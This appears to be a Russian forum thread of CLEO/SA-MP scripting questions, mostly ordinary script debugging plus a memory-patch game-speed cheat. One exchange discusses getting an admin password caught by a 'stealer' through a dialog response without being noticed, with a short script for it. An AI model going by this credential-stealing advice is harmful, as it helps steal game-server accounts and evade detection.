Вопросы по CLEO-скриптингу

pwned

Участник
142
5
CLEO:
{$CLEO}
0000:

const
TOGGLE = 0@
end

const
MAX_STREAM_ID = 1@
PLAYER_ID     = 2@
NICK          = 3@
end

const
HPED = 4@
end

repeat
    wait 100
until SAMP.Available()

0B34: samp register_client_command "scan" to_label @toggle

while true
    wait 0
    if TOGGLE == true
    then
        0C8A: samp MAX_STREAM_ID = get_max_player_id streamed_only true
        for PLAYER_ID = 0 to MAX_STREAM_ID
            if 0B20: samp HPED = actor_handle_by_samp_player_id PLAYER_ID
            then
                if 02F2: actor HPED model == #SBMOTR2 // скин какого-то бича
                then
                    0B36: samp NICK = get_player_nickname PLAYER_ID
                    log "%s[%d] бомж" NICK PLAYER_ID
                end
            end
        end
    end 
end

:toggle
0B12: TOGGLE = TOGGLE XOR 1
SAMP.CmdRet()
Не работает(
 
1,417
1,029
Захожу в игру, постоянный флуд этим сообщением
CLEO:
{$CLEO}
0000:

const
TOGGLE = 0@
end

const
MAX_STREAM_ID = 1@
PLAYER_ID     = 2@
NICK          = 3@
end

const
HPED = 4@
end

repeat
    wait 100
until SAMP.Available()

0B34: samp register_client_command "scan" to_label @toggle

while true
    wait 0
    if TOGGLE == true
    then
        0C8A: samp MAX_STREAM_ID = get_max_player_id streamed_only true
        for PLAYER_ID = 0 to MAX_STREAM_ID
            if 0B20: samp HPED = actor_handle_by_samp_player_id PLAYER_ID
            then
                if 02F2: actor HPED model == #SBMOTR2 // скин какого-то бича
                then
                    0B36: samp NICK = get_player_nickname PLAYER_ID
                    0af8: "%s[%d] бомж" -1 NICK PLAYER_ID
                end
            end
        end
      TOGGLE = false
    end 
end

:toggle
0B12: TOGGLE = TOGGLE XOR 1
SAMP.CmdRet()
 

pwned

Участник
142
5
CLEO:
{$CLEO}
0000:

const
TOGGLE = 0@
end

const
MAX_STREAM_ID = 1@
PLAYER_ID     = 2@
NICK          = 3@
end

const
HPED = 4@
end

repeat
    wait 100
until SAMP.Available()

0B34: samp register_client_command "scan" to_label @toggle

while true
    wait 0
    if TOGGLE == true
    then
        0C8A: samp MAX_STREAM_ID = get_max_player_id streamed_only true
        for PLAYER_ID = 0 to MAX_STREAM_ID
            if 0B20: samp HPED = actor_handle_by_samp_player_id PLAYER_ID
            then
                if 02F2: actor HPED model == #SBMOTR2 // скин какого-то бича
                then
                    0B36: samp NICK = get_player_nickname PLAYER_ID
                    0af8: "%s[%d] бомж" -1 NICK PLAYER_ID
                end
            end
        end
      TOGGLE = false
    end
end

:toggle
0B12: TOGGLE = TOGGLE XOR 1
SAMP.CmdRet()
А как еще скин добавить, чтобы 2 проверяло?
 

enziweee

Участник
28
32
Код:
{$CLEO}
{$INCLUDE SF}

// Eiinoaiou ea niauoee
const
EVENT_BUTTON_CLICKED                = 257
EVENT_COMBOBOX_SELECTION_CHANGED    = 513
EVENT_RADIOBUTTON_CHANGED           = 769
EVENT_CHECKBOX_CHANGED              = 1025
EVENT_SLIDER_VALUE_CHANGED          = 1281
EVENT_EDITBOX_STRING                = 1537
EVENT_EDITBOX_CHANGE                = 1538
EVENT_LISTBOX_ITEM_DBLCLK           = 1793
EVENT_LISTBOX_SELECTION             = 1794
end

0000:
var
20@ : int
12@ : int
end
wait 1750
10@ = 0
:1
wait 200                             
if SAMP.Available
else_jump @1
goto @Patch
0B80: dialog 0@ = create "[CLEO] GameSpeed by Bladee" 
0B84: dialog 0@ set_pos_XY 850 500 size 200 100
0B91: dialog 0@ add_static id 1 text "Скорость" pos_XY 2 0 size 150 20
0B96: dialog 0@ add_slider id 2 pos_XY 2 30 size 100 35 max 5
0B86: dialog 0@ set_visible 0

   
while true
    wait 0
    if
        0ADC:   test_cheat "speed"
        then
            if 10@ == 0
            then
                0B5D: samp toggle_cursor 1
                0B86: dialog 0@ set_visible 1
                10@ = 1
                wait 500
            else
                0B5D: samp toggle_cursor 0
                0B86: dialog 0@ set_visible 0
                10@ = 0
                wait 500
            end   
    end   
    if 0B81: dialog 0@ pop_event_to 1@ control_id_to 2@
    then
        if 1@ == EVENT_SLIDER_VALUE_CHANGED
        then
            if 2@ == 2
            then
                0AF8: samp add_message_to_chat "Ползунок слайдера был передвинут. Компонент №%d" color -1 params 2@
                0B97: dialog 0@ slider 2@ get_value_to 3@
                0AF8: samp add_message_to_chat "Текущее положение слайдера(значение): %d" color -1 params 3@
                015D: set_gamespeed 10.0
            end
        end
    end
end
:Patch

for 20@ = 0 to 9
    12@ = 0x00401190
    12@ += 20@
0A8C: write_memory 12@ size 1 value 0x90 virtual_protect 1

    end
return

не изменяет скорость без @patch, с patch вообще не отображается dxut диалог

крч челики, вопрос решил сам.
ответ:
Код:
 0A8C: writeMem 0x00401196 sz 4 val 2.0 vp 0
 
Последнее редактирование модератором:

Azller Lollison

я узбек
Друг
1,342
2,266
запалит, если ты будешь этот пароль отсылать себе, например get запросом, а если он просто будет в скрипте, то ничего не случится

upd. понял про что ты, отправляй через
0BC9: samp send_dialog_response dialog 0@ button 1@ listitem 2@ input 3@
в любой ид диалога, главное в инпут вставь переменную с паролем и стиллер словит её
Эх, никак не работает :( Не ловит стиллер.
CLEO:
{$CLEO}
{$NOSOURCE}

0000:
:Samp
wait 600
   SAMP.Available
jf @Samp

0B34: "alogin" @alogin
0BDE: 0

:alogin
0B35: samp 1@ = get_last_command_params
say "/alogin %d" 1@
0BC9: samp send_dialog_response dialog 1337 button 0@ listitem 3@ input 1@
SAMP.CmdRet()
 

noob213

Известный
33
2
Привет снова! Наткнулся на такую ошибку. Суть скрипта в том что если скорость автомобиля больше 150, проходит смс с уведомлением, но когда сажусь в машину, все замедляется и крашит, в чем ошибка?
CLEO:
{$CLEO .cs}
{$INCLUDE SF.}
0000: NOP
wait 2000


:main
wait 0
00DF:   actor $PLAYER_ACTOR driving
jf @main
02E3: 1@ = car $Player_Actor speed
if 1@ > 150
then

    chatmsg "{ffffff}Ваша скорость больше: {fa0000}150!" // code
end
CLEO:
WHILE TRUE
wait 100
IF 00DF:   actor $PLAYER_ACTOR driving
    THEN
        03C0: 0@ = actor $PLAYER_ACTOR car
        02E3: 1@ = car 0@ speed
        IF 1@ >= 150.0
        THEN
           chatmsg " " -1
      END
    END
END
 
Последнее редактирование:
1,417
1,029
Короче парни может кто подсказать, как сделать так чтобы скрипт когда серевер выводит диалог считывал с него информацию и отправлял ответ, что-то типо вот такого диалога Изображение загруженно на фотохостинг Япикс. Заранее благодарен.
хук на RPC_SCRSHOWDIALOG
 
1,417
1,029
Короче парни может кто подсказать, как сделать так чтобы скрипт когда серевер выводит диалог считывал с него информацию и отправлял ответ, что-то типо вот такого диалога Изображение загруженно на фотохостинг Япикс. Заранее благодарен.
это не тема с заказами скриптов, принцип я описал, ставишь хук, считываешь информацию из диалога, проверяешь на совпадение текст и отправляешь ответ, например через
CLEO:
0BC9: samp send_dialog_response dialog 0@ button 1@ listitem 2@ input 3@
более подробно о работе с хуком написано тут Информация - Гайд - Работа с RakNet хуками с помощью SAMPFUNCS(https://blast.hk/threads/17440/)
 

Pavel3221

Новичок
10
0
Приветствую, как вывести последнее число в "chatmsg" через опкод SAMP.IsCommandTyped(0@) ? Можно что бы выдавало с ошибкой, например число от 1 до 7, если введено 8 то -> "else / chatmsg "Число может быть от 1 до 7." " Заранее спасибо
 

itsLegend

Фонд борьбы за жуков 🐞
Администратор
2,695
1,448
Приветствую, как вывести последнее число в "chatmsg" через опкод SAMP.IsCommandTyped(0@) ? Можно что бы выдавало с ошибкой, например число от 1 до 7, если введено 8 то -> "else / chatmsg "Число может быть от 1 до 7." " Заранее спасибо
После SAMP.IsCommandTyped(0@) вызываешь 0C1A: 1@ = atoi 0@ и получаешь число. Делай с ним что хочешь.
 
  • Нравится
Реакции: Pavel3221